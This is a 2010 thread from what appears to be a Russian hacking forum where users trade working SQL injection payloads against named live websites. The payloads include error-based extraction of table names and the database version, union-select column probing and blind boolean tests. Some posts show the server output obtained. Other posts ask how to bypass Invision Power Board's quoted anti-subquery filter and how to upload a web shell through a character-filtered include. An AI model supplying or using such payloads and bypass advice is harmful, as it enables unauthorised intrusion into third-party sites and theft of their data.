Ваши вопросы по уязвимостям.

16.05.2010, 18:06

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

С нами: 9649706

Репутация: 3338

Цитата:

Сообщение от LokbatanLi

floor(rand(0)*100)>>Query error: Subquery returns more than 1 row

prosto xo4u imeno 1 ubrat ??

a kak ?

Код:

http://www.rokk.ru/index.php?cat=50&item=-21+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

http://www.rokk.ru/index.php?cat=50&item=-21+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

...

PS: Включай уже логику, твой первый вопрос совсем никак не связан со вторым, не "почему 1", а "почему не могу раскрутить" тогда уж

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось Pashkela; 16.05.2010 в 18:12..

16.05.2010, 18:25

Byrger

Постоянный

Регистрация: 07.03.2008

Сообщений: 479

С нами: 9567480

Репутация: 61

Привет всем.
есть сайт с sql-inj котрые не выдает ошибку но пишет верно или не верно запрос проведен (0 или 1)
Если делаю 1'+and+1=1--+ то выдает 1
Если 1'+and+1=2--+ То 0

Проблема в том что я не могу воспользоваться конструкцией 1'+group+by+1--+ (ну или другое число допустим 50) всегда возвращает 0

Есть вероятность что это MsSQL

как мне быть, что попробовать?

16.05.2010, 21:05

Skipp

Новичок

Регистрация: 12.05.2010

Сообщений: 2

С нами: 8421303

Репутация: 0

Нужна помощь, собственно http://pocketbook.by/index.php?id=306+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15--+
А если ставишь минус перед 306, вылетает пустая страница, подскажите где я затупил )

16.05.2010, 23:03

LaVey

Новичок

Регистрация: 27.12.2009

Сообщений: 16

С нами: 8617416

Репутация: 0

в IPB есть такой фильтр

PHP код:


		
			
        if ( ! IPS_DB_ALLOW_SUB_SELECTS )

        {

            # On the spot allowance?

            if ( ! $this->allow_sub_select )

            {

                $_tmp = strtolower( $this->_removeAllQuotes($the_query) );



                if ( preg_match( "#(?:/\*|\*/)#i", $_tmp ) )

                {

                    $this->throwFatalError( "You are not allowed to use comments in your SQL query.\nAdd \ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them\n{$the_query}" );

                    return false;

                }



                if ( preg_match( "#[^_a-zA-Z]union[^_a-zA-Z]#s", $_tmp ) )

                {

                    $this->throwFatalError( "UNION query joins are not allowed.\nAdd \ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them\n{$the_query}" );

                    return false;

                }

                else if ( preg_match_all( "#[^_a-zA-Z](select)[^_a-zA-Z]#s", $_tmp, $matches ) )

                {

                    if ( count( $matches ) > 1 )

                    {

                        $this->throwFatalError( "SUB SELECT query joins are not allowed.\nAdd \ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them\n{$the_query}" );

                        return false;

                    }

                }

            }

        }

Есть мысли как его обойти?

Последний раз редактировалось LaVey; 16.05.2010 в 23:05..

16.05.2010, 23:58

Skipp

Новичок

Регистрация: 12.05.2010

Сообщений: 2

С нами: 8421303

Репутация: 0

Код:

http://pocketbook.by/index.php?id=(select+1+from+(select+count(0),conca t((select+version()),floor(rand(0)*2))+from+inform ation_schema.tables+group+by+2+limit+1)a)--+

Что-то выводит
Ответ MySQL сервера:
Duplicate entry '5.1.44-community-log1' for key 'group_key'.

Не понятно

17.05.2010, 00:02

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

С нами: 9846041

Репутация: 1177

Цитата:

Сообщение от Skipp

Код:

http://pocketbook.by/index.php?id=(select+1+from+(select+count(0),conca t((select+version()),floor(rand(0)*2))+from+inform ation_schema.tables+group+by+2+limit+1)a)--+

Что-то выводит
Ответ MySQL сервера:
Duplicate entry '5.1.44-community-log1' for key 'group_key'.

Не понятно

ну так ты выводишь через blind, выводжишь в ошибку version()
что не понятно? Ты запросил вывести version(), вывело version() o_0

16.05.2010, 21:07

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

С нами: 9649706

Репутация: 3338

Код:

http://pocketbook.by/index.php?id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+

17.05.2010, 00:00

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

С нами: 9410786

Репутация: 2731

Есть инклуд, в котором режутся следующие символы:

"." (точка)
"/" (слеш)
"[ и ]" (квадратные скобки)
" " (пробел)

Вопрос - как залить шелл, если есть доступ к файлу с PHP-кодом. Тобишь выполнять команды и фукнкции я могу, к примеру echo(`ls`); - выведет список файлов. Но вот никакие аргументы никакой команде не могу передать, т.к. пробел режется. Работа с любыми массивами (к примеру $_GET[]) также отпадает, скобки режутся, а register_globals = Off. Всяческие функции типа copy() тоже не сработают, т.к. в пути к шеллу (а именно в "http://" или "ftp://") есть слеши, которые режутся. Через chr() не могу строку передать - конкатенация (точка) режется.

Вот такие вот дела, больше ничего придумать не могу...